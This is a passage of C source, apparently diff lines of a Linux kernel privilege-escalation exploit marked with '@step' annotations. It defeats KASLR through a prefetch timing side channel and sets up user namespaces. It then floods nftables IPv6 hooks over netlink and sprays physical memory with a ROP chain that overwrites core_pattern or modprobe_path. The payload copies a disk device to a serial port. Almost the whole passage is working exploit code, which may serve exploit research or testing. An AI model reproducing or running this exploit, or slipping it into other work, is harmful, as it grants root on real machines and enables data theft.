namespace-safe payload delivery via memfd */ +static char g_modprobe_path[64] = "/tmp/pw"; +static int g_pw_fd = -1; +static int g_result_fd = -1; + +/* core_pattern approach */ +static const char g_core_cmd[] = "|/bin/dd if=/dev/vdb of=/dev/ttyS0"; +static int use_core_pattern = 1; + +#ifndef SYS_memfd_create +#define SYS_memfd_create 319 +#endif + +/* ---------- helpers ---------- */ +static void die(const char *msg) { + perror(msg); + _exit(1); +} +static void sleep_ms(int ms) { + struct timespec ts = { ms / 1000, (ms % 1000) * 1000000L }; + nanosleep(&ts, nullptr); +} +static uint64_t env_u64(const char *name) { + const char *val = getenv(name); + return val ? 
strtoull(val, nullptr, 0) : 0; +} + +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + + errno = 0; + char *end = nullptr; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast<uint64_t>(v); + return true; + } + + errno = 0; + end = nullptr; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast<uint64_t>(v); + return true; + } + return false; +} + +static bool kernel_cmdline_has_token(const char *token) { + if (!token || !*token) return false; + + char buf[4096] = {}; + int cmdline_fd = open("/proc/cmdline", O_RDONLY | O_CLOEXEC); + if (cmdline_fd < 0) return false; + ssize_t n = read(cmdline_fd, buf, sizeof(buf) - 1); + close(cmdline_fd); + if (n <= 0) return false; + buf[n] = '\0'; + + size_t token_len = strlen(token); + for (char *p = buf; *p;) { + while (*p == ' ' || *p == '\n' || *p == '\t') p++; + if (!*p) break; + char *q = p; + while (*q && *q != ' ' && *q != '\n' && *q != '\t') q++; + if (static_cast<size_t>(q - p) == token_len && memcmp(p, token, token_len) == 0) + return true; + p = q; + } + return false; +} +static void cpu_pin(int cpu) { + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + sched_setaffinity(0, sizeof(cpuset), &cpuset); +} + +static int setup_check_smap(void) { + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) return 1; + char line[4096]; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "flags", 5) == 0) { + fclose(f); + if (strstr(line, " smap")) + return 1; + return 0; + } + } + fclose(f); + return 1; +} + +/* ================================================================ + * KASLR bypass: prefetch side channel + * ================================================================ */ +// @step(name="KASLR Bypass via Prefetch Side Channel") +#define PREFETCH_SCAN_TRIES (64 * 1024) +#define PREFETCH_CONFIRM_TRIES (128 * 1024) +#define PREFETCH_HIST_SIZE 4000 +#define 
PREFETCH_THRESHOLD_DEFAULT 190 +#define PREFETCH_THRESHOLD_XEON 130 +#define PREFETCH_THRESHOLD_MARGIN 24 +#define KTEXT_SCAN_START 0xffffffff81000000ULL +#define KTEXT_SCAN_END 0xffffffffc1000000ULL +#define KTEXT_SCAN_STEP 0x200000ULL +#define KTEXT_INTEL_STEP 0x1000000ULL +#define DIRECT_MAP_START 0xffff888000000000ULL +#define DIRECT_MAP_END 0xffffc88000000000ULL +#define DIRECT_MAP_COARSE_STEP 0x80000000ULL +#define DIRECT_MAP_CAND_STEP 0x10000000ULL +#define DIRECT_MAP_REFINE_STEP 0x10000000ULL +#define INTEL_PREFETCH_SAMPLES 16 +#define INTEL_PREFETCH_VOTES 7 +#define INTEL_DIRECT_COARSE_STEP 0x40000000ULL +#define INTEL_DIRECT_REFINE_STEP 0x4000000ULL + +static size_t prefetch_hist[PREFETCH_HIST_SIZE]; +static int prefetch_threshold; +static int prefetch_cpu_vendor = -1; + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) +{ + uint64_t a, d; + asm volatile("mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) +{ + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline void prefetch_probe(const void *p) +{ + asm volatile("prefetchnta (%0)" : : "r"(p)); + asm volatile("prefetcht2 (%0)" : : "r"(p)); +} + +static size_t prefetch_once(uint64_t addr) +{ + size_t t = rdtsc_begin(); + prefetch_probe((const void *)addr); + return rdtsc_end() - t; +} + +static size_t prefetch_measure_tries(uint64_t addr, int tries) +{ + memset(prefetch_hist, 0, sizeof(prefetch_hist)); + for (int i = 0; i < tries; i++) { + size_t d = prefetch_once(addr); + if (d >= PREFETCH_HIST_SIZE) + d = PREFETCH_HIST_SIZE - 1; + prefetch_hist[d]++; + } + + size_t sum = 
0; + for (int i = 0; i < PREFETCH_HIST_SIZE; i++) + sum += prefetch_hist[i] * i; + return sum / tries; +} + +static size_t prefetch_measure(uint64_t addr) +{ + return prefetch_measure_tries(addr, PREFETCH_CONFIRM_TRIES); +} + +static int prefetch_cpu_is_intel(void) +{ + if (prefetch_cpu_vendor >= 0) + return prefetch_cpu_vendor == 1; + + prefetch_cpu_vendor = 0; + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) + return 0; + + char line[512]; + while (fgets(line, sizeof(line), f)) { + if (strstr(line, "GenuineIntel") || strstr(line, "Intel(R)")) { + prefetch_cpu_vendor = 1; + break; + } + } + fclose(f); + return prefetch_cpu_vendor == 1; +} + +static void detect_prefetch_threshold(void) +{ + char buf[512] = {0}; + int cpuinfo_fd = open("/proc/cpuinfo", O_RDONLY | O_CLOEXEC); + + prefetch_threshold = PREFETCH_THRESHOLD_DEFAULT; + if (cpuinfo_fd >= 0) { + ssize_t n = read(cpuinfo_fd, buf, sizeof(buf) - 1); + close(cpuinfo_fd); + if (n > 0 && strstr(buf, "Xeon")) + prefetch_threshold = PREFETCH_THRESHOLD_XEON; + } +} + +static void pin_prefetch_cpu(cpu_set_t *oldset, int *have_old) +{ + cpu_set_t set; + + *have_old = sched_getaffinity(0, sizeof(*oldset), oldset) == 0; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(0, sizeof(set), &set) < 0) + perror("sched_setaffinity(prefetch)"); +} + +static void restore_prefetch_cpu(cpu_set_t *oldset, int have_old) +{ + if (have_old && sched_setaffinity(0, sizeof(*oldset), oldset) < 0) + perror("sched_setaffinity(restore)"); +} + +static size_t prefetch_measure_min(uint64_t addr, int samples, + int prime_syscall) +{ + size_t best = (size_t)-1; + + for (int i = 0; i < samples; i++) { + if (prime_syscall) + (void)syscall(SYS_getuid); + size_t t = prefetch_once(addr); + if (t < best) + best = t; + } + return best; +} + +static uint64_t prefetch_scan_lowest_vote(const char *name, uint64_t start, + uint64_t end, uint64_t step, + uint64_t probe_add, + int prime_syscall) +{ + cpu_set_t oldset; + int have_old = 0; + 
uint64_t votes[INTEL_PREFETCH_VOTES] = {}; + + pin_prefetch_cpu(&oldset, &have_old); + printf("[*] prefetch %s: intel-min step=%#lx probe_add=%#lx\n", + name, (unsigned long)step, (unsigned long)probe_add); + + for (int vote = 0; vote < INTEL_PREFETCH_VOTES; vote++) { + uint64_t best_addr = 0; + size_t best = (size_t)-1; + size_t second = (size_t)-1; + unsigned long best_idx = 0; + unsigned long idx = 0; + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_min(addr + probe_add, + INTEL_PREFETCH_SAMPLES, + prime_syscall); + if (t < best) { + second = best; + best = t; + best_addr = addr; + best_idx = idx; + } else if (t < second) { + second = t; + } + } + + if (second != (size_t)-1 && best == second) { + printf("[*] prefetch %s: intel vote %d flat best=%#lx t=%zu\n", + name, vote, (unsigned long)best_addr, best); + votes[vote] = 0; + continue; + } + + votes[vote] = best_addr; + printf("[*] prefetch %s: intel vote %d best=%#lx i=%lu t=%zu second=%zu\n", + name, vote, (unsigned long)best_addr, best_idx, best, second); + } + + restore_prefetch_cpu(&oldset, have_old); + + uint64_t candidate = 0; + int balance = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) { + if (!votes[i]) + continue; + if (balance == 0) { + candidate = votes[i]; + balance = 1; + } else if (candidate == votes[i]) { + balance++; + } else { + balance--; + } + } + + int count = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) + if (votes[i] == candidate) + count++; + + if (candidate && count > INTEL_PREFETCH_VOTES / 2) { + printf("[+] prefetch %s: intel found=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return candidate; + } + + printf("[!] 
prefetch %s: intel majority failed candidate=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return 0; +} + +static uint64_t prefetch_scan_first_hit(const char *name, uint64_t start, + uint64_t end, uint64_t step) +{ + cpu_set_t oldset; + int have_old = 0; + unsigned long idx = 0; + uint64_t found = 0; + + if (!prefetch_threshold) + detect_prefetch_threshold(); + + pin_prefetch_cpu(&oldset, &have_old); + (void)prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t bad = prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t threshold = prefetch_threshold; + if (bad + PREFETCH_THRESHOLD_MARGIN < threshold) + threshold = bad + PREFETCH_THRESHOLD_MARGIN; + printf("[*] prefetch %s: bad=%zu threshold=%zu step=%#lx\n", + name, bad, threshold, (unsigned long)step); + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_tries(addr, PREFETCH_SCAN_TRIES); + if ((idx & 0x3ff) == 0) + printf("[*] prefetch %s: addr=%#lx i=%lu t=%zu\n", + name, (unsigned long)addr, idx, t); + if (t > threshold) { + size_t confirm = prefetch_measure(addr); + if (confirm > threshold) { + found = addr; + printf("[+] prefetch %s: found=%#lx i=%lu t=%zu/%zu\n", + name, (unsigned long)addr, idx, t, confirm); + break; + } + printf("[*] prefetch %s: transient=%#lx t=%zu/%zu\n", + name, (unsigned long)addr, t, confirm); + } + } + + restore_prefetch_cpu(&oldset, have_old); + if (!found) + printf("[!] 
prefetch %s: no hit\n", name); + return found; +} + +static void add_u64_candidate(uint64_t *arr, int *n, int max, uint64_t val) +{ + if (!val) + return; + for (int i = 0; i < *n; i++) + if (arr[i] == val) + return; + if (*n < max) + arr[(*n)++] = val; +} + +static uint64_t leak_kernel_text_prefetch(void) +{ + if (prefetch_cpu_is_intel()) { + return prefetch_scan_lowest_vote("kernel-entry", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_INTEL_STEP, + off_entry_syscall, 1); + } + return prefetch_scan_first_hit("kernel-text", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_SCAN_STEP); +} + +static uint64_t leak_direct_mapping_prefetch(void) +{ + uint64_t coarse, ref_start, ref_end, refined; + + if (prefetch_cpu_is_intel()) { + coarse = prefetch_scan_lowest_vote("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, + INTEL_DIRECT_COARSE_STEP, 0, 0); + if (!coarse) + return 0; + + ref_start = coarse > 2 * INTEL_DIRECT_COARSE_STEP ? + coarse - 2 * INTEL_DIRECT_COARSE_STEP : + DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + INTEL_DIRECT_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_lowest_vote("direct-map-refine", ref_start, + ref_end, + INTEL_DIRECT_REFINE_STEP, 0, 0); + return refined ? refined : coarse; + } + + coarse = prefetch_scan_first_hit("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, DIRECT_MAP_COARSE_STEP); + if (!coarse) + return 0; + + ref_start = coarse > 3 * DIRECT_MAP_COARSE_STEP ? + coarse - 3 * DIRECT_MAP_COARSE_STEP : DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + DIRECT_MAP_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_first_hit("direct-map-refine", ref_start, + ref_end, DIRECT_MAP_REFINE_STEP); + return refined ? 
refined : coarse; +} + +static uint64_t kbase_cands[MAX_KBASE_CANDS]; +static int n_kbase_cands = 0; +static uint64_t phbase_cands[MAX_PHBASE_CANDS]; +static int n_phbase_cands = 0; + +static int leak_entrybleed(void) { + printf("[*] Entrybleed: scanning kbase with prefetch side channel...\n"); + kbase = leak_kernel_text_prefetch(); + + if (kbase < 0xffffffff81000000ULL || + kbase >= 0xffffffffc1000000ULL) { + printf("[-] Entrybleed: kbase %#lx out of range\n", + (unsigned long)kbase); + kbase = 0; + return 0; + } + + n_kbase_cands = 0; + add_u64_candidate(kbase_cands, &n_kbase_cands, MAX_KBASE_CANDS, kbase); + for (int d = -16; d <= 16 && n_kbase_cands < MAX_KBASE_CANDS; d++) { + if (d == 0) continue; + uint64_t c = kbase + d * KTEXT_SCAN_STEP; + if (c < 0xffffffff81000000ULL || c >= 0xffffffffc1000000ULL) continue; + add_u64_candidate(kbase_cands, &n_kbase_cands, + MAX_KBASE_CANDS, c); + } + printf("[+] kbase=%#lx (%d candidates)\n", + (unsigned long)kbase, n_kbase_cands); + + if (use_userblob) { + phbase = 0xffff888000000000ULL; + printf("[*] Entrybleed: skipping physmap scan (userblob mode)\n"); + return 1; + } + + printf("[*] Entrybleed: scanning direct-map base with prefetch side channel...\n"); + phbase = leak_direct_mapping_prefetch(); + + if (phbase < DIRECT_MAP_START || phbase >= DIRECT_MAP_END) { + printf("[-] Entrybleed: phbase %#lx out of range\n", + (unsigned long)phbase); + phbase = 0; + return 0; + } + + n_phbase_cands = 0; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, phbase); + int spiral[] = {-1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6}; + for (size_t s = 0; s < sizeof(spiral) / sizeof(spiral[0]) && + n_phbase_cands < MAX_PHBASE_CANDS; s++) { + uint64_t c = phbase + spiral[s] * DIRECT_MAP_CAND_STEP; + if (c < DIRECT_MAP_START || c >= DIRECT_MAP_END) continue; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, c); + } + printf("[+] phbase=%#lx (%d candidates)\n", + (unsigned long)phbase, n_phbase_cands); + 
return 1; +} + +/* ================================================================ + * Namespace setup + * ================================================================ */ +// @step(name="Namespace Setup") +static void xwrite(const char *path, const char *str) { + int file_fd = open(path, O_WRONLY | O_CLOEXEC); + if (file_fd < 0) die(path); + if (write(file_fd, str, strlen(str)) < 0) { /* ignore */ } + close(file_fd); +} +static void setup_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + if (uid == 0) { + if (setresgid(DROP_GID, DROP_GID, DROP_GID) < 0) + die("setresgid(drop)"); + if (setresuid(DROP_UID, DROP_UID, DROP_UID) < 0) + die("setresuid(drop)"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + uid = getuid(); + gid = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(NEWUSER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char mapbuf[64]; + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", uid); + xwrite("/proc/self/uid_map", mapbuf); + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", gid); + xwrite("/proc/self/gid_map", mapbuf); + if (setresgid(0, 0, 0) < 0) die("setresgid(root)"); + if (setresuid(0, 0, 0) < 0) die("setresuid(root)"); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NEWNET)"); + int lo_sock = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (lo_sock >= 0) { + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(lo_sock, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(lo_sock, SIOCSIFFLAGS, &ifr); + close(lo_sock); + } +} + +/* ================================================================ + * Netlink helpers + * ================================================================ */ +static int nl_sock = -1; +static uint32_t nl_seq; + +static void *nlmsg_tail(struct nlmsghdr *nlh) { + return (char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len); +} +static int nla_put(struct nlmsghdr *nlh, size_t mx, uint16_t type, + const void *data, size_t len) { + size_t nw = NLMSG_ALIGN(nlh->nlmsg_len) + 
NLA_ALIGN(NLA_HDRLEN + len); + if (nw > mx) return -1; + struct nlattr *attr = (struct nlattr *)nlmsg_tail(nlh); + attr->nla_type = type; + attr->nla_len = NLA_HDRLEN + len; + if (len) memcpy((char*)attr + NLA_HDRLEN, data, len); + nlh->nlmsg_len = nw; + return 0; +} +static int nlastr(struct nlmsghdr *nlh, size_t mx, uint16_t type, const char *str) { + return nla_put(nlh, mx, type, str, strlen(str)+1); +} +static int nla32(struct nlmsghdr *nlh, size_t mx, uint16_t type, uint32_t val) { + val = htonl(val); + return nla_put(nlh, mx, type, &val, 4); +} +static struct nlattr *nla_nest_s(struct nlmsghdr *nlh, size_t mx, uint16_t type) { + size_t nw = NLMSG_ALIGN(nlh->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN); + if (nw > mx) return nullptr; + struct nlattr *attr = (struct nlattr *)nlmsg_tail(nlh); + attr->nla_type = type | NLA_F_NESTED; + attr->nla_len = NLA_HDRLEN; + nlh->nlmsg_len = nw; + return attr; +} +static void nla_nest_e(struct nlmsghdr *nlh, struct nlattr *attr) { + attr->nla_len = (char *)nlmsg_tail(nlh) - (char *)attr; +} + +static int nl_open(void) { + nl_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, NETLINK_NETFILTER); + if (nl_sock < 0) return -1; + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sa.nl_pid = (uint32_t)getpid(); + if (bind(nl_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) return -1; + int bufsz = NL_BUFSZ; + setsockopt(nl_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(nl_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static size_t batch_hdr(char *buf, size_t mx, uint16_t type, uint16_t res) { + (void)mx; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = type; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++nl_seq; + nlh->nlmsg_pid = getpid(); + nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = 
htons(res); + return NLMSG_ALIGN(nlh->nlmsg_len); +} + +static int recv_ack(uint32_t seq) { + char buf[8192]; + struct timeval tv = {RECV_TIMEOUT_SEC, 0}; + setsockopt(nl_sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + for (;;) { + ssize_t n = recv(nl_sock, buf, sizeof(buf), 0); + if (n <= 0) return -errno; + for (struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + NLMSG_OK(nlh, (unsigned)n); nlh = NLMSG_NEXT(nlh, n)) { + if (nlh->nlmsg_type != NLMSG_ERROR) continue; + struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(nlh); + if (nlh->nlmsg_seq == seq) return err->error; + } + } +} + +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_CREATE | NLM_F_EXCL) + +static int nft_newtable(uint8_t fam, const char *name) { + char buf[4096]; + size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (struct nlmsghdr *)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWTABLE); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t seq_num = ++nl_seq; + op->nlmsg_seq = seq_num; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = fam; + nfg->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_TABLE_NAME, name); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(seq_num); +} + +static int nft_newchain(uint8_t fam, const char *tab, const char *chain, + uint32_t hooknum, int32_t prio) { + char buf[4096]; + size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (struct nlmsghdr *)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = 
NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t seq_num = ++nl_seq; + op->nlmsg_seq = seq_num; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = fam; + nfg->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_CHAIN_TABLE, tab); + nlastr(op, sizeof(buf), NFTA_CHAIN_NAME, chain); + struct nlattr *hk = nla_nest_s(op, sizeof(buf), NFTA_CHAIN_HOOK); + nla32(op, sizeof(buf), NFTA_HOOK_HOOKNUM, hooknum); + nla32(op, sizeof(buf), NFTA_HOOK_PRIORITY, (uint32_t)prio); + nla_nest_e(op, hk); + nla32(op, sizeof(buf), NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(seq_num); +} + +/* ================================================================ + * IPv6 hook saturation + * ================================================================ */ +// @step(name="Saturate IPv6 LOCAL_OUT Hooks") +static int saturate_ipv6_hooks(void) { + printf("[*] creating ipv6 table t6\n"); + int err = nft_newtable(NFPROTO_IPV6, "t6"); + if (err && err != -EEXIST) { + printf("[-] newtable ipv6: %d\n", err); + return -1; + } + printf("[*] saturating ipv6 LOCAL_OUT...\n"); + int i; + for (i = 0; i < IPV6_SATURATE_MAX; i++) { + char name[32]; + snprintf(name, sizeof(name), "c%d", i); + err = nft_newchain(NFPROTO_IPV6, "t6", name, + NF_INET_LOCAL_OUT, 0); + if (err == -E2BIG) { + printf("[+] ipv6 LOCAL_OUT saturated at %d chains\n", i); + break; + } + if (err) { + printf("[-] ipv6 chain %d: %d\n", i, err); + return -1; + } + if (i % PROGRESS_INTERVAL == 0) printf(" ... 
%d\n", i); + } + if (i >= IPV6_SATURATE_MAX) { + printf("[-] failed to saturate (reached max)\n"); + return -1; + } + printf("[*] creating inet table ti\n"); + err = nft_newtable(NFPROTO_INET, "ti"); + if (err && err != -EEXIST) { + printf("[-] newtable inet: %d\n", err); + return -1; + } + return 0; +} + +/* ================================================================ + * Physmap spray + ROP blob + * + * Uses runtime-resolved offsets from kernelXDK instead of + * hardcoded #defines. + * ================================================================ */ +// @step(name="Physmap Spray with ROP Blob") +static void spray_physmap(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(nullptr, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t leak_physmap_kva(void) { + int pagemap_fd = open("/proc/self/pagemap", O_RDONLY); + if (pagemap_fd < 0) return 0; + uint64_t vaddr = (uint64_t)phys_region; + uint64_t entry = 0; + if (pread(pagemap_fd, &entry, 8, (off_t)(vaddr/4096)*8) != 8) { + close(pagemap_fd); + return 0; + } + close(pagemap_fd); + if (!(entry & (1ULL<<63))) return 0; + uint64_t pfn = entry & ((1ULL<<55)-1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Build a fake nft_rule_blob containing a 4-expression ROP chain. + * + * Each expression uses nft_immediate_ops to write 16 bytes into + * nft_do_chain's register file at the dreg corresponding to the + * return address region on the stack. 
+ * + * Effective ROP chain when nft_do_chain returns: + * ret+0: pop rsi; pop rdi; ret (load args for strcpy) + * ret+8: src_va (path string in this page) + * ret+16: target_va (core_pattern address) + * ret+24: strcpy (overwrite core_pattern) + * ret+32: pop rdi; ret (load msleep arg) + * ret+40: 0x7FFFFFFF (~25 days) + * ret+48: msleep (keep system alive) + * ret+56: return_thunk (clean return) + */ +static void rop_build_blob(uint8_t *blob, uint64_t page_kva) { + uint64_t target_va = use_core_pattern ? + (kbase + off_core_pattern) : (kbase + off_modprobe); + uint64_t nft_imm_ops = kbase + off_nft_imm_ops; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK; + uint64_t pop_rdi = kbase + OFF_POP_RDI_JMP_RETURN_THUNK; + uint64_t strcpy_va = kbase + off_strcpy; + uint64_t msleep_va = kbase + off_msleep; + uint64_t ret_thunk = kbase + off_return_thunk; + uint64_t src_va = page_kva + PATH_OFFSET; + + memset(blob, 0, BLOB_TOTAL_SIZE); + + /* blob_gen->size: rdp0(8) + 4*expr(128) + rdp1(8) = 144 = 0x90 */ + uint64_t blob_size = 0x90; + memcpy(blob + 0x000, &blob_size, 8); + + /* Rule descriptor: dlen = 4 expressions * 0x20 = 128, is_last = 0 */ + uint64_t rdp0 = (128ULL << 1) | 0; + memcpy(blob + 0x008, &rdp0, 8); + + /* Expr 0: pop rsi=src_va, pop rdi=target_va -> DREG_RET (ret addr) */ + memcpy(blob + 0x010, &nft_imm_ops, 8); /* expr->ops */ + uint64_t *d1 = (uint64_t*)(blob + 0x018); + d1[0] = pop_rsi_rdi; + d1[1] = src_va; + blob[0x028] = DREG_RET; + blob[0x029] = 16; /* dreg, len */ + + /* Expr 1: strcpy(target, src_va) -> DREG_RET4 (ret+16) */ + memcpy(blob + 0x030, &nft_imm_ops, 8); + uint64_t *d2 = (uint64_t*)(blob + 0x038); + d2[0] = target_va; + d2[1] = strcpy_va; + blob[0x048] = DREG_RET4; + blob[0x049] = 16; + + /* Expr 2: pop rdi=MSLEEP_FOREVER -> DREG_RET8 (ret+32) */ + memcpy(blob + 0x050, &nft_imm_ops, 8); + uint64_t *d3 = (uint64_t*)(blob + 0x058); + d3[0] = pop_rdi; + d3[1] = MSLEEP_FOREVER; + blob[0x068] = DREG_RET8; + blob[0x069] = 
16; + + /* Expr 3: msleep(MSLEEP_FOREVER) -> DREG_RET12 (ret+48) */ + memcpy(blob + 0x070, &nft_imm_ops, 8); + uint64_t *d4 = (uint64_t*)(blob + 0x078); + d4[0] = msleep_va; + d4[1] = ret_thunk; + blob[0x088] = DREG_RET12; + blob[0x089] = 16; + + /* End-of-rules marker */ + uint64_t rdp1 = 1; + memcpy(blob + 0x090, &rdp1, 8); +} + +// @step(name="Fill Physmap with ROP Blob") +static void rop_fill_physmap(void) { + uint8_t blob[256]; + rop_build_blob(blob, g_page_kva); + + const char *payload_str = use_core_pattern ? + g_core_cmd : g_modprobe_path; + size_t path_len = strlen(payload_str) + 1; + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) { + uint8_t *pg = (uint8_t*)phys_region + o; + memset(pg, 0, PATH_OFFSET + 64); + memcpy(pg, blob, BLOB_TOTAL_SIZE); + memcpy(pg + PATH_OFFSET, payload_str, path_len); + } + printf("[+] physmap filled with ROP blob + %s (%s)\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + payload_str); +} + +/* ================================================================ + * msg_msg spray (kmalloc-256 reclaim for nft_base_chain) + * + * msg_msg header size and nft_base_chain field offsets are + * resolved from kernelXDK at runtime. 
